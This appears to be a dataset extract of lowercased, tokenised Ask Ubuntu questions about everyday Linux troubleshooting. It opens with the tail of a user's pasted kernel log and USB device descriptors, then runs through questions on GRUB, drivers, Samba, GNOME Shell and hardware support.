] assuming drive cache : write through jan 4 17:31:27 a-ubuntu kernel : [ 374.804693 ] sd 6:0:0:0 : [ sdb ] read capacity failed jan 4 17:31:27 a-ubuntu kernel : [ 374.804698 ] sd 6:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok jan 4 17:31:27 a-ubuntu kernel : [ 374.804704 ] sd 6:0:0:0 : [ sdb ] sense not available . jan 4 17:31:27 a-ubuntu kernel : [ 374.804744 ] sd 6:0:0:0 : [ sdb ] no caching mode page present jan 4 17:31:27 a-ubuntu kernel : [ 374.804748 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jan 4 17:31:27 a-ubuntu kernel : [ 374.804754 ] sdb : detected capacity change from 8199864320 to 0 jan 4 17:31:27 a-ubuntu kernel : [ 374.820273 ] scsi : killing requests for dead queue jan 4 17:31:27 a-ubuntu kernel : [ 374.852240 ] scsi : killing requests for dead queue jan 4 17:31:27 a-ubuntu kernel : [ 374.980054 ] usb 2-4 : new high speed usb device number 4 using ehci_hcd jan 4 17:31:43 a-ubuntu kernel : [ 390.092059 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:31:58 a-ubuntu kernel : [ 405.308070 ] usb 2-4 : device descriptor read/64 , error -110 jan 4 17:31:58 a-ubuntu kernel : [ 405.524078 ] usb 2-4 : new high speed usb device number 5 using ehci_hcd and the other post is : http : //pastebin.ubuntu.com/792915/ and the other bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 idvendor 0x04f2 chicony electronics co. , ltd idproduct 0xb008 usb 2.0 camera bcddevice 93.27 imanufacturer 2 chicony electronics co. , ltd. iproduct 1 chicony usb 2.0 camera iserial 3 sn0001 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 565 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface association : blength 8 bdescriptortype 11 bfirstinterface 0 binterfacecount 2 bfunctionclass 14 video bfunctionsubclass 3 video interface collection bfunctionprotocol 0 ifunction 1 chicony usb 2.0 camera interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 1 video control binterfaceprotocol 0 iinterface 1 chicony usb 2.0 camera videocontrol interface descriptor : blength 13 bdescriptortype 36 bdescriptorsubtype 1 ( header ) bcduvc 1.00 wtotallength 77 dwclockfrequency 15.000000mhz bincollection 1 bainterfacenr ( 0 ) 1 videocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 2 wterminaltype 0x0101 usb streaming bassocterminal 0 bsourceid 4 iterminal 0 videocontrol interface descriptor : blength 26 bdescriptortype 36 bdescriptorsubtype 6 ( extension_unit ) bunitid 4 guidextensioncode { 7033f028-1163-2e4a-ba2c-6890eb334016 } bnumcontrol 1 bnrpins 1 basourceid ( 0 ) 3 bcontrolsize 1 bmcontrols ( 0 ) 0x01 iextension 0 videocontrol interface descriptor : blength 18 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 1 wterminaltype 0x0201 camera sensor bassocterminal 0 iterminal 0 wobjectivefocallengthmin 0 wobjectivefocallengthmax 0 wocularfocallength 0 bcontrolsize 3 bmcontrols 0x00000000 videocontrol interface descriptor : blength 11 bdescriptortype 36 bdescriptorsubtype 5 ( processing_unit ) warning : descriptor too short bunitid 3 bsourceid 1 wmaxmultiplier 0 bcontrolsize 2 bmcontrols 0x0000053f brightness contrast hue saturation sharpness gamma backlight compensation power line frequency iprocessing 0 bmvideostandards 0x a ntsc - 525/60 secam - 625/50 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0010 1x 16 bytes binterval 6 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 0 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 videostreaming interface descriptor : blength 14 bdescriptortype 36 bdescriptorsubtype 1 ( input_header ) bnumformats 1 wtotallength 345 bendpointaddress 129 bminfo 0 bterminallink 2 bstillcapturemethod 0 btriggersupport 1 btriggerusage 0 bcontrolsize 1 bmacontrols ( 0 ) 27 videostreaming interface descriptor : blength 27 bdescriptortype 36 bdescriptorsubtype 4 ( format_uncompressed ) bformatindex 1 bnumframedescriptors 7 guidformat { 59555932-0000-1000-8000-00aa00389b71 } bbitsperpixel 16 bdefaultframeindex 1 baspectratiox 0 baspectratioy 0 bminterlaceflags 0x00 interlaced stream or variable : no fields per frame : 2 fields field 1 first : no field pattern : field 1 only bcopyprotect 0 videostreaming interface descriptor : blength 46 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 1 bmcapabilities 0x00 still image unsupported wwidth 640 wheight 480 dwminbitrate 614400 dwmaxbitrate 18432000 dwmaxvideoframebuffersize 614400 dwdefaultframeinterval 333333 bframeintervaltype 5 dwframeinterval ( 0 ) 333333 dwframeinterval ( 1 ) 500000 dwframeinterval ( 2 ) 666666 dwframeinterval ( 3 ) 1000000 dwframeinterval ( 4 ) 2000000 videostreaming interface descriptor : blength 46 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 2 bmcapabilities 0x00 still image unsupported wwidth 352 wheight 288 dwminbitrate 202752 dwmaxbitrate 6082560 dwmaxvideoframebuffersize 202752 dwdefaultframeinterval 333333 bframeintervaltype 5 dwframeinterval ( 0 ) 333333 dwframeinterval ( 1 ) 500000 dwframeinterval ( 2 ) 666666 dwframeinterval ( 3 ) 1000000 dwframeinterval ( 4 ) 2000000 videostreaming interface descriptor : blength 46 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 3 bmcapabilities 0x00 still image unsupported wwidth 320 wheight 240 dwminbitrate 153600 dwmaxbitrate 4608000 dwmaxvideoframebuffersize 153600 dwdefaultframeinterval 333333 bframeintervaltype 5 dwframeinterval ( 0 ) 333333 dwframeinterval ( 1 ) 500000 dwframeinterval ( 2 ) 666666 dwframeinterval ( 3 ) 1000000 dwframeinterval ( 4 ) 2000000 videostreaming interface descriptor : blength 46 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 4 bmcapabilities 0x00 still image unsupported wwidth 176 wheight 144 dwminbitrate 50688 dwmaxbitrate 1520640 dwmaxvideoframebuffersize 50688 dwdefaultframeinterval 333333 bframeintervaltype 5 dwframeinterval ( 0 ) 333333 dwframeinterval ( 1 ) 500000 dwframeinterval ( 2 ) 666666 dwframeinterval ( 3 ) 1000000 dwframeinterval ( 4 ) 2000000 videostreaming interface descriptor : blength 46 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 5 bmcapabilities 0x00 still image unsupported wwidth 160 wheight 120 dwminbitrate 38400 dwmaxbitrate 1152000 dwmaxvideoframebuffersize 38400 dwdefaultframeinterval 333333 bframeintervaltype 5 dwframeinterval ( 0 ) 333333 dwframeinterval ( 1 ) 500000 dwframeinterval ( 2 ) 666666 dwframeinterval ( 3 ) 1000000 dwframeinterval ( 4 ) 2000000 videostreaming interface descriptor : blength 34 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 6 bmcapabilities 0x00 still image unsupported wwidth 1280 wheight 800 dwminbitrate 2048000 dwmaxbitrate 18432000 dwmaxvideoframebuffersize 2048000 dwdefaultframeinterval 1333333 bframeintervaltype 2 dwframeinterval ( 0 ) 1333333 dwframeinterval ( 1 ) 2000000 videostreaming interface descriptor : blength 34 bdescriptortype 36 bdescriptorsubtype 5 ( frame_uncompressed ) bframeindex 7 bmcapabilities 0x00 still image unsupported wwidth 1280 wheight 1024 dwminbitrate 2621440 dwmaxbitrate 23592960 dwmaxvideoframebuffersize 2621440 dwdefaultframeinterval 1333333 bframeintervaltype 2 dwframeinterval ( 0 ) 1333333 dwframeinterval ( 1 ) 2000000 videostreaming interface descriptor : blength 6 bdescriptortype 36 bdescriptorsubtype 13 ( colorformat ) bcolorprimaries 1 ( bt.709 , srgb ) btransfercharacteristics 1 ( bt.709 ) bmatrixcoefficients 4 ( smpte 170m ( bt.601 ) ) interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 1 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0080 1x 128 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 2 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0100 1x 256 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 3 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0320 1x 800 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 4 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x0b20 2x 800 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 5 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x1320 3x 800 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 6 bnumendpoints 1 binterfaceclass 14 video binterfacesubclass 2 video streaming binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x13e8 3x 1000 bytes binterval 1 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 239 miscellaneous device bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) bus 006 device 002 : id 04d9:1503 holtek semiconductor , inc. shortboard lefty device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 8 idvendor 0x04d9 holtek semiconductor , inc. idproduct 0x1503 shortboard lefty bcddevice 3.10 imanufacturer 1 iproduct 2 usb keyboard iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 59 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 1 boot interface subclass binterfaceprotocol 1 keyboard iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 62 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 1 binterfaceclass 3 human interface device binterfacesubclass 0 no subclass binterfaceprotocol 0 none iinterface 0 hid device descriptor : blength 9 bdescriptortype 33 bcdhid 1.10 bcountrycode 0 not supported bnumdescriptors 1 bdescriptortype 34 report wdescriptorlength 101 report descriptors : ** unavailable ** endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 10 device status : 0x0000 ( bus powered )
92630	can all files associated with previous linux be deleted ?	i am currently using 2.6.32-37 with 2.6.32-36 as a backup . i have various files & dirs ( /boot /lib/firmware /lib/modules /usr/share/doc /usr/src /var/lib/dpkg/info /var/lib/initramfs-tools ) that contain remnants of 2.6.32-24 thru 2.6.32-35 . can these old files & dirs be removed from my system ?
92631	installation problem - bootlogo	i have problem with installation . when i start my computer it shows me text : loading bootlogo ... after a few minutes it shows : edd : error 1000 reading sector 352846
92636	how do i get a digipro wp8060 tablet working ?	i am hoping to find some assistance with installing my digipro wp806 tablet with ubuntu 10.10 if anyone is available to help i have done some research myself , but the documentation i 've come accross is very confusing .
92638	no left click on a cyborg rat 7 usb mouse	i am having an issue with my usb mouse ( cyborg rat 7 ) i purchased this mouse for the comfort and high dpi , and just made the switch to ubuntu today , and would really like to stay with this . but i need the mouse for work . the problem is that shortly after connecting the mouse i lose left click functions and have to disconnect and reconnect the mouse . i tried a solution listed in another question by `` malisha '' - sudo apt-get repository ppa : raof/aubergine sudo apt-get update sudo apt-get upgrade but i got the error `` e : invalid operation repository '' when i try to enter the first line in the terminal . any help with this will be great thanks .
92642	is the ubuntu one android app available for the amazon kindle fire ?	i was hoping that it would be possible to have the app downloaded from the amazon android app store , however it is not available there . i realize that it is available from the google android marketplace ; however that does not recognize the kindle fire as an android device , thus it will not allow me to download it on to my new kindle fire . i know there hacks to get around this but they require either an emulated android device or another droid . neither in my case are feasible options , which i suppose would be the same case for many potential customers/users especially seeing as the kindle fire is the most popular tablet next to apple iproducts .
92643	how do i add ubuntu to the msconfig boot menu on windows 7 ?	i have installed ubuntu to a separate partition , with the grub bootloader on that partition . i am now wondering how to add the grub bootloader to msconfig in windows 7 so it will ask me to boot to ubuntu or win 7 , upon booting my windows 7 bootloader . i would add it to the boot.ini except that windows 7 does n't have it , everything is managed through msconfig.exe
92654	how do i get my epg to come back on mythtv ?	everything on the schedule is coming up as unknown . i ca n't set up programs to record as nothing is on . have run updates , channel scan , mythfill database . still no epg . how do i get my epg to come back on mythtv ?
92655	how can i sync my root gedit with my user gedit 's preferences ?	when i open a file with root gedit i 'd like to have the same setup as my normal gedit . so theme , preferences , and addons . can i set up some sym links in the right spot to achieve this ?
92656	is there a terminal command that can change gnome 3 's chat status ?	i am working o a script that will automatically change the gnome shell integrated chat/messaging status to `` unavailable '' when the screen is locked , or the gnome-screensaver is activated . anyone knows what is the terminal command that sets the gnome messaging system status to `` available '' or `` unavailable '' ? i have tried addons on pidgin and empathy , but it seems like the gnome messaging status does not depend on these .
92657	how can i solve an xbox 360 'nat moderate ' issue if i do n't have access to the router ?	after finally managing to get my xbox 360 to connect to live , i 've run into the `` nat moderate '' issue . first of all here 's my setup ... wireless broadband > ( usb ) > laptop ubuntu 11.10 > ( ethernet ) > xbox 360 i 've read a lot of forums solving the nat issue , such as ehttp : //ubuntuforums.org/showthread.php ? t=538796 , but they are all situations using a router . from my understanding its certain ports that need to be forwarded . is it possible to fix this if i do n't have a router to forward ports on ? since i do n't have access to the dmz ? cheers
92658	mv : failed to preserve ownership	i have two computers , both running ubuntu ( ubuntu server 10.04lts on one , ubuntu desktop 10.10 on the other ) . i setup a samba share on the desktop . on the server , i mounted the samba share to /mnt/fileserver . this is the share : [ files ] path = /home/fileserver/files guest ok = yes writeable = yes create mask = 0777 directory mask = 0777 i have a script on the server to backup my local web development files and put them on the desktop . they are bzipped and then put into the samba mount . when i try to move them into the samba mount with the mv command , i get mv : failed to preserve ownership for 'file ' : permission denied this is what my script looks like : _dir= $ ( date + % m- % d- % y ) mkdir /mnt/fileserver/webserver_backups/ $ _dir tar vfcpj /tmp/www.tar.bz2 /var/www 2 > > /var/log/backup.txt mv /tmp/www.tar.bz2 /mnt/fileserver/webserver_backups/ $ _dir/www.tar.bz2 all the files still seem to make it over okay , but i 'm curious why i get this error .
92660	how to get the laptop fan cooler to work on an acer aspire 5315 ?	i installed ubuntu in my acer aspire 5315 but now the cooler does n't work anymore ! i already read a lot of forums and i tried many suggested solutions but they did n't work . i already tried with the laptop-mode-tools , to enable the laptop-mode in the acpi-support file , to upgrade the kernel , and a few others . i managed to start the cooler but it works only sometimes and it does n't depend on the temperature . and when i restart my computer the cooler does n't work again and then i do n't have the possibility to change the settings again because all of them are already set to be `` on '' . the only solution that i did n't try is to flash the bios , because i 'm not an expert and i read that this is quiet dangerous for the motherboard . does anybody know any other solution ? i want to stay in ubuntu but my laptop ca n't work longer than 15 minutes ! thank you very much !
92661	how do i keep my nvidia card 's refresh rate at 75 hz ?	how i can do to keep my 1440x900 74 mz configuration after reboot ? after configuring it in nvidia settings and reboot , it returns to previous 60 hz . thanks in advance for your help .
92670	waiting for network configuration	i had no issues with my startup until i went into network manager , went to wireless , and added a wireless connection ... when i restarted the pc to apply the changes , i was hit with the `` waiting for network configuration ... '' delay . it eventually boots , but only after a few extra minutes of waiting . so i assume its something to do with the wireless interface , since thats what i changed . how do i revert this back to the way it was ? and fix the issue . cheers
92672	how can i bring up the grub menu ?	i installed ubuntu as a dual boot system with windows 7 . i was on my user account earlier today and i changed the password . i shut down the computer and tried to re-login but i totally forgot the new password . i found a helpful tutorial : https : //help.ubuntu.com/11.04/ubuntu-help/user-forgottenpassword.html however , i am struggling to find the grub menu . when the computer starts up , i have two options windows 7 or ubuntu . i enter ubuntu and a black screen appears for a quick second and then a purple loading screen starts . after about 20 seconds , it fades and another black screen appears with lines of code . i tried pressing down on shift or pressing esc . however , each time , it just goes to the ubuntu login screen . what can i do to bring up the grub menu ?
92673	vaio laptop 's wireless indicator blinking when connected to access point	i have a vaio laptop model vgn-c22gh . it has a built in wireless card with a intel centrino processor on his motherboard . when using ubuntu 10.04 , the wireless indicator blinks violently . this symptom does not appear with earlier versions of ubuntu like 9.10 or 8.10 . this leads me to believe that it is a driver issue . is it something that i should worry about ? i have no idea where to look for , since this is a very limited scope problem . should i report to cannonical about this problem of mine ? ?
92675	in tty1 after login it says `` module unknown '' and log me out automatically	i 'm using ubuntu 11.10 . after i login in any tty1-6 it show the message `` module unknown '' and log me out automatically . but in the graphical session i am logged in correctly . how to solve the problem ?
92676	is there a way to automatically detect the 3g port without using wvdialconfig every time ?	i am using 10.04 server . i have a 3g wireless card , use the switch program which i get from the manufacturer , i can change the 3g card from usb storage mode to 3g modem mode , then following devices are created in /dev : ttyusb0 , ttyusb1 , ttyusb2 . but i do n't know which device to should choose to use 3g , so i have to run wvdialconfig to scan all the possible port and find the proper one . is there a way to automatically detect the 3g port without using wvdialconfig to scan all the port every time ?
92677	how to use huawei ec156 modem on 10.10 ?	how to configure tata photon+ usb modem huawei ec156 on ubuntu 10.10 maverick meerkat . it is not getting detected in network manager nor in media . is there any way out to configure and use internet with the modem on ubuntu 10.10 .
92679	session freezes when using the screen command	this happens to me once every couple of hours . when i use the screen command and attempt to switch between windows by pressing ctrl+shift+a twice in succession , my session freezes . this has happened to me when i 've used putty to ssh to cloud servers and also to servers in my lan at home . does anyone know any fixes to this ?
92680	is there a simple way to create stacked notifications in gnome shell ?	for example notify-send will create a new notification icon in the tray every time it 's executed . i have n't been able to find an easy , preferably scriptable , way of creating these .
92681	how to auto change terminal profiles ?	i love transparency and minimalism ... a lot . so much so i ended up with a desktop like this : the problem is that to add a cool effect i made my terminal windows transparent . which for the most part looks pretty good , except for the fact that i ca n't see anything when it 's above other windows . here 's an example : i would like to know if there is a way to auto change the profile of the terminal whenever it is above another window to say , something more visible . and then autochange it back whenever the terminal has no windows under it ( also including conky ) .
92683	samsung corby 2 bluetooth 3.0 ca n't reconnect , `` permission error 13 ''	samsung corby 2 bluetooth 3.0 profile my phone has problem with reconnecting mobile broadband connection using bluetooth . when i connect to my mobile broadband connection profile in ubuntu , and when i disconnect that connection , and try to reconnect that again it shows network disconnected , and bluetooth permission error 13. i have to turn off my mobile and then turn on to reconnect that connection profile ! is there any way to reconnect using dun profile without restarting my phone ? please help me !
92684	ubuntu one deleted files	my question is i uploaded more than 3gigs of data on ubuntuone . then i sold my pc and got new one . after the fresh installation on new pc when i installed ubuntuone it synchronized with ubuntu one and deleted all files : / means pc1 - uploaded 3gb data new pc - sync ~ data gone ! btw i 'm on ubuntu 10.4
92685	avi playback terrible - ubuntu 11.10 on a old thinkpad t42	when playing standard definition avi files in vlc ( and other media players ) on my old thinkpad t42 in ubuntu 11.10 , the playback is terrible : it 's kinda slow and choppy - borderline unwatchable . playing video in youtube is pretty much perfect . can anyone help ? kind regards - mike
92686	how can i install gsettings schema via a gnome shell extension ?	i started to write my own gnome shell extensions and ca n't find any answer to this question - > is there any way , how to install gsettings schema on machine just via extension code ( e.g . not copying schema.xml into glib-2.0/schemas directory and compiling by terminal ) ? if i try to `` make '' access to not-installed schema it starts crashing and looking glass keeps telling that such a schema does n't exist . it 's really uncomfortable for potential users who wants to install those extensions .
92698	printing canon lbp2900 problems	i am using ubuntu 11.10 64bit i tried to install my canon printer lbp2900 using several methods but the printer did n't work and i have this written in printer states : idle - /usr/lib/cups/filter/pstocapt failed and when typing this command captstatusui -p lbp2900 this what i get : ( captstatusui:2432 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( captstatusui:2432 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( captstatusui:2432 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( captstatusui:2432 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , plesae help me
92699	are setcap-changes permanent	when using setcap for a file , is this change permanent or do i have to invoke setcap somewhere at boot time ? setcap cap_sys_nice fooexecutable
92705	nvidia optimus - howto configure xserver on dual screen ?	i have notebook with nvidia optimus technology . i have installed bumblebee and everything seems to work fine . the problem is that when i connected a second monitor to my notebook after login , it works well , but when i start the notebook with the monitor connected , then xserver is not able to start . how to configure xserver to make it work ? this is my hardware config : $ xrandr -q screen 0 : minimum 320 x 200 , current 3040 x 900 , maximum 8192 x 8192 lvds1 connected 1600x900+1440+0 ( normal left inverted right x axis y axis ) 382mm x 214mm 1600x900 60.0*+ 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga2 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 410mm x 256mm 1440x900 59.9*+ 1280x1024 75.0 60.0 1152x864 75.0 1280x720 75.0 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) edit : here is my horg.log [ 15.921 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat jan 7 23:00:34 2012 [ 15.921 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 15.921 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 15.921 ] ( == ) no layout section . using the first screen section . [ 15.921 ] ( == ) no screen section available . using defaults . [ 15.921 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 15.921 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 15.921 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 15.921 ] ( ** ) | | -- > device `` default device '' [ 15.921 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 15.921 ] ( == ) automatically adding devices [ 15.921 ] ( == ) automatically enabling devices [ 15.921 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 15.921 ] entry deleted from font path . [ 15.921 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 15.921 ] entry deleted from font path . [ 15.921 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 15.921 ] entry deleted from font path . [ 15.921 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 15.921 ] entry deleted from font path . [ 15.921 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 15.921 ] entry deleted from font path . [ 15.921 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 15.921 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 15.921 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 15.921 ] ( ii ) loader magic : 0x7e0220 [ 15.921 ] ( ii ) module abi versions : [ 15.921 ] x.org ansi c emulation : 0.4 [ 15.921 ] x.org video driver : 10.0 [ 15.921 ] x.org xinput driver : 12.3 [ 15.921 ] x.org server extension : 5.0 my xorg.conf is almost empty : section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection howto configure xorg to make it works ?
92707	how do i remove wubi ?	i downloaded wubi a couple of months ago and realised it made my laptop bootup significantly slower . it has also made it slower in general . recently i have been trying to uninstall wubi from my laptop but i cant . this is because i can not find any of the wubi or ubuntu files . this is hard because i cant unistall it and i do n't know where to search for the files .
92708	how to recreate apache configuration directory ?	i was setting an apache instance up . and accidentally , i did rm -rf /etc/apache2 . now i do n't have any configurations . oh . i sudo apt-get install apache2 -- reinstall , but did n't ' work : ( how can i make the directory again ? i 'm using ubuntu 10.04 lts server .
92717	how to get a notification when other users login into `` my '' system ?	i know the who command showing me all logged in users . but i want to somehow informed when someone but me loggs into my system . any applet ? would also be nice if the applet shows the number of distinct users logged in , meaning having a login shell and established ssh connection .
92718	dell e6520 ubuntu 11.10 64bit no working vga / dvi	i ca n't get any external monitor to work with my dell e6520 after an upgrade . from 11.04 - > 11.10 , which is pretty damn annoying . i got a second monitor to work for a short moment once . currently the nvidia settings manager does not propperly configure any external monitor reliable . it just goes back to the old configuration after 15 seconds . it used to work before.. my actions so far : updated the bios to the newest version . installed ironhide with and without optimus enabled . installed nvidia drivers i found somewhere that the 32bit version of ubuntu is fully supported on the dell e6520 . should i switch and start using that ? think i will wait until the next version before i waste another few hours or so on fixing this . since the next version of ubuntu got improved graphics stuff coming . update fixed almost all my issues using the default opensource drivers . i ca n't get my hdmi port to work ( yet ) but the vga port works now again . yay !
92724	authenticate window doesnât appear anymore	authenticate window doesnât appear anymore in my lubuntu 11.10 64bit when i try to run synaptic or time and date from menu , nothing goes on . i can authenticate and run the programs only in console . ** ( polkit-gnome-authentication-agent-1:1319 ) : warning ** : unable to register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : can not determine user of subject can not register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : can not determine user of subject
92727	what is hlds and what is it for ?	i currently use two computers , one is windows 7 and mainly for gaming , and the other is running 11.10 , when i was on steam browsing today i noticed that at the bottom of the steam page you can click on a drop-down named `` tools '' and under it it says `` linux hlds update tool '' clicking on it brings up a download . does anyone know what this is for ? is this a patch for a steam-linux application that i am unaware of ?
92728	is a gnome3 fallback session without the panels possible on the livecd ?	is a gnome 3 fallback session without the panels , that does n't conflict with unity possible on a live cd ? on an installed system it works when i write a *.session in /usr/share/gnome-session . but on a live cd that does n't work , because ubuntu will load unity . why ?
92733	how can i disable recent documents in unity ?	how do i disable the tracking and display of recently opened files ( and whatever else is remembered ) in a default installation of ubuntu ? ( this question originally concerned 11.10 , but now that i 'm on 12.04 , that 's the answer i 've selected . ) ( note that this is not a duplicate of how can i keep recent files from appearing in unity ? , since that question and its answers are concerned with temporary and specific filtering . i want to disable it completely for a single user account . ) okay , to deflect the inevitable and expand on my motivation ... while trawling the usual forums and google results for a solution , it ( unsurprisingly ) seems that the near-universal use cases for this request are either browsing porn or warhammer research . and the obvious solution to this is to create another user account to contain all evidence . however , this is not why i 'm asking , and i do n't say that to get all high and mighty about it , it 's because this answer wo n't help . ( even though i really do n't have any interest in warhammer , and i have no idea how that paint pot and brush ended up in my drawer , no that 's not glue on my thumb , etc . ) my actual use case is that i use my personal laptop for presentations in different circles of my life . i have a user account set up with all the settings i like for presentations ( shortcuts , small launcher , default associations , etc ) . but i do n't want an accidental keystroke ( or the find dialog ) to display other recent presentations i 've given , or the files i used in composing the presentation , or whatever . i also do n't want to have to recreate this profile for every single presentation i might give . i just want a nice little isolated , memoryless , clean corner of my notebook for public display .
92740	download only latest file with wget	i want to wget ( or other download batch command ) the latest file that is added to a large repository . the latest nightly build thru http . i could mirror all files , but the repository are huge so i want to be able to remove old files and only trigger when there is a new file .
92741	gnome shell extension themes not working	i recently installed the gnome tweak tool , and i am trying to install the theme `` fa誰ence '' so i navigate to the file and it says it has successfully installed , however the only thing that has changed is the start bar across the top with the date/time , icons etc , the windows look exactly the same . the only way i can change the appearance of the windows is by changing gtk+ themes , however they 're all awful . i 'm sure that gtk is n't much to do with the shell themes , am i right ? and yes i do have user themes extension installed . many thanks for your help in advance .
